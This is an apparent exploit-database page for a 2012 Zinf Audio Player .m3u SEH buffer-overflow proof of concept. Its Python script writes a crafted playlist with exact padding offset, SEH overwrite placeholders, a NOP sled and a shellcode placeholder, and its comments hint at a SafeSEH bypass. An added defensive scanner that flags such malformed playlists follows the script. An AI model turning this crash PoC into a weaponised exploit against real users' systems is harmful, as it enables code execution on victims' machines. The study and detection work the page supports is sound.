Zinf Audio Player (m3u file) Buffer Overflow Vulnerability(SEH)(POC)



EKU-ID: 1691 CVE: OSVDB-ID:
Author: mAniNdArK Published: 2012-03-19 Verified: Verified


#!/usr/bin/python


#Product Details:
#---------------------------------------------------------------------------------
#The Zinf audio player is a simple, but powerful audio player for Linux and Win32.
#It supports MP3, Ogg/Vorbis, WAV and Audio CD playback, SHOUTcast/Icecast
#HTTP streaming, RTP streaming, a powerful music browser, theme support
#and a download manager. Zinf is based on the FreeAmp source code. However,
#AMP is a trademark of PlayMedia Systems, Inc., and therefore the original name
#of the project cannot be used any longer. On this website the old project will
#be referred to as FreeA*p.
#---------------------------------------------------------------------------------

# Banner. Single-argument print() calls run unchanged under both Python 2 and 3.
print("Exploit Title: Zinf Audio Player (m3u file) Buffer Overflow Vulnerability(SEH)(POC)\n")
print("Version:       2.2.1\n")
print("Date:          3-18-2012\n")
print("Author:        mAniNdArK\n")
print("Software Link: http://www.zinf.org\n")
print("Category:      Local\n")
print("Tested on:     Windows XP SP3 Professional(En)\n")

print("Greetz To:Bedu33n,N!1l,Rex0Man,Escape X0ne,JingoBD,Annihilat0r_BD,00xnull,\n")
print("34GL3_3Y3,5!L3NT @55@55!N,s1l3n7 BD,\n")
print("Rudr0 Akash,p5YcH0 d0d93r And All The Members\n")
print("Of Bangladesh Cyber Army(BCA)\n")
print("Mail:manindark.bca@gmail.com")
print("---------------------------------------------------------\n")


#0198F9B4   41414141  AAAA
#0198F9B8   41414141  AAAA
#0198F9BC   41414141  AAAA
#0198F9C0   41414141  AAAA
#0198F9C4   41414141  AAAA
#0198F9C8   41414141  AAAA
#0198F9CC   41414141  AAAA
#0198F9D0   41414141  AAAA
#0198F9D4   41414141  AAAA
#0198F9D8   41414141  AAAA
#0198F9DC   41414141  AAAA
#0198F9E0   41414141  AAAA
#0198F9E4   41414141  AAAA
#0198F9E8   41414141  AAAA
#0198F9EC   41414141  AAAA
#0198F9F0   41414141  AAAA
#0198F9F4   41414141  AAAA
#0198F9F8   41414141  AAAA
#0198F9FC   42424242  BBBB  Pointer to next SEH record
#0198FA00   43434343  CCCC  SE handler
#0198FA08   90909090  ....
#0198FA0C   44444444  DDDD
#0198FA10   44444444  DDDD

#Instructions:
#Right click and select Open...
#Then select the playlist file poc.m3u

file = "poc.m3u"

# Bytes literals and binary-mode output keep the payload byte-exact under both
# Python 2 and Python 3 (a text-mode write under Python 3 would encode \x90 as
# two bytes and shift the whole layout).
junk = b"\x41" * 12148
nseh = b"B" * 4        # Address=42424242 SE handler=*** CORRUPT ENTRY ***  use a short jmp here...
seh = b"C" * 4         # Address=0198F9FC SE handler=43434343
                       # there are lots of modules without SafeSEH, like download.ui, which can be used to bypass SEH protection
nop = b"\x90" * 8
shellcode = b"D" * 1000   # shellcode placeholder; this PoC only crashes the player

try:
    print("[*] Creating exploit file...\n")
    with open(file, "wb") as writeFile:
        writeFile.write(junk + nseh + seh + nop + shellcode)
    print("[*] File successfully created!")
except IOError as err:
    print("[!] Error while creating file: %s" % err)
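The PoC relies on a single playlist entry that is far longer than any real path or URL, padded with one repeated byte and followed by raw non-text bytes. The scanner below is an added defensive check written for this page, not part of the original PoC or of Zinf; it flags .m3u/.m3u8 files with those traits so they can be quarantined or triaged before a vulnerable player opens them. It assumes Python 3, the thresholds MAX_ENTRY_LEN and MAX_RUN_LEN are assumptions rather than values from the advisory, and both sample playlists are constructed here (the second one mirrors the layout the PoC writes).

```python
"""Defensive check (added example, not part of the PoC above): flag .m3u
playlists whose entries look like overflow padding rather than paths or
URLs. Thresholds are assumptions, not values from Zinf or the advisory."""

import sys

MAX_ENTRY_LEN = 4096   # assumption: real playlist entries are far shorter
MAX_RUN_LEN = 256      # assumption: no real path repeats one byte this often


def longest_run(raw):
    """Return the length of the longest run of one repeated byte in raw."""
    best = cur = 0
    prev = None
    for b in raw:
        cur = cur + 1 if b == prev else 1
        prev = b
        if cur > best:
            best = cur
    return best


def scan_m3u(data, max_len=MAX_ENTRY_LEN, max_run=MAX_RUN_LEN):
    """Scan raw playlist bytes; return one finding per suspicious line.

    Each finding is {"line": n, "reasons": [...]}. Directive lines such as
    #EXTM3U and #EXTINF get the same checks as path/URL lines, since the
    overflow is triggered by line length, not by line type.
    """
    findings = []
    for lineno, raw in enumerate(data.splitlines(), start=1):
        if not raw.strip():
            continue
        reasons = []
        if len(raw) > max_len:
            reasons.append("oversized entry (%d bytes)" % len(raw))
        run = longest_run(raw)
        if run >= max_run:
            reasons.append("run of %d identical bytes" % run)
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            # Paths and URLs are text; NOP sleds and shellcode are not.
            reasons.append("not valid UTF-8 text")
        else:
            if any(ord(c) < 0x20 and c != "\t" or c == "\x7f" for c in text):
                reasons.append("control characters")
        if reasons:
            findings.append({"line": lineno, "reasons": reasons})
    return findings


def scan_file(path):
    """Convenience wrapper: scan a playlist on disk."""
    with open(path, "rb") as fh:
        return scan_m3u(fh.read())


# Constructed samples: a normal playlist and one laid out like the PoC
# (padding, NSEH, SEH, NOPs, payload placeholder) in a single entry.
BENIGN = (b"#EXTM3U\n"
          b"#EXTINF:213,Some Artist - Some Track\n"
          b"C:\\Music\\track01.mp3\n"
          b"http://radio.example/stream\n")
POC_LIKE = b"A" * 12148 + b"B" * 4 + b"C" * 4 + b"\x90" * 8 + b"D" * 1000

if __name__ == "__main__":
    targets = sys.argv[1:]
    if targets:
        for path in targets:
            for f in scan_file(path):
                print("%s: line %d: %s" % (path, f["line"], "; ".join(f["reasons"])))
    else:
        print("benign sample:", scan_m3u(BENIGN))
        print("PoC-like sample:", scan_m3u(POC_LIKE))
```

Run it with one or more playlist paths as arguments, or with none to scan the two embedded samples. The three heuristics are independent on purpose: a length cap alone would miss a shorter padding entry, while the repeated-byte and non-UTF-8 checks catch the padding and NOP/payload bytes even when the entry is under the cap.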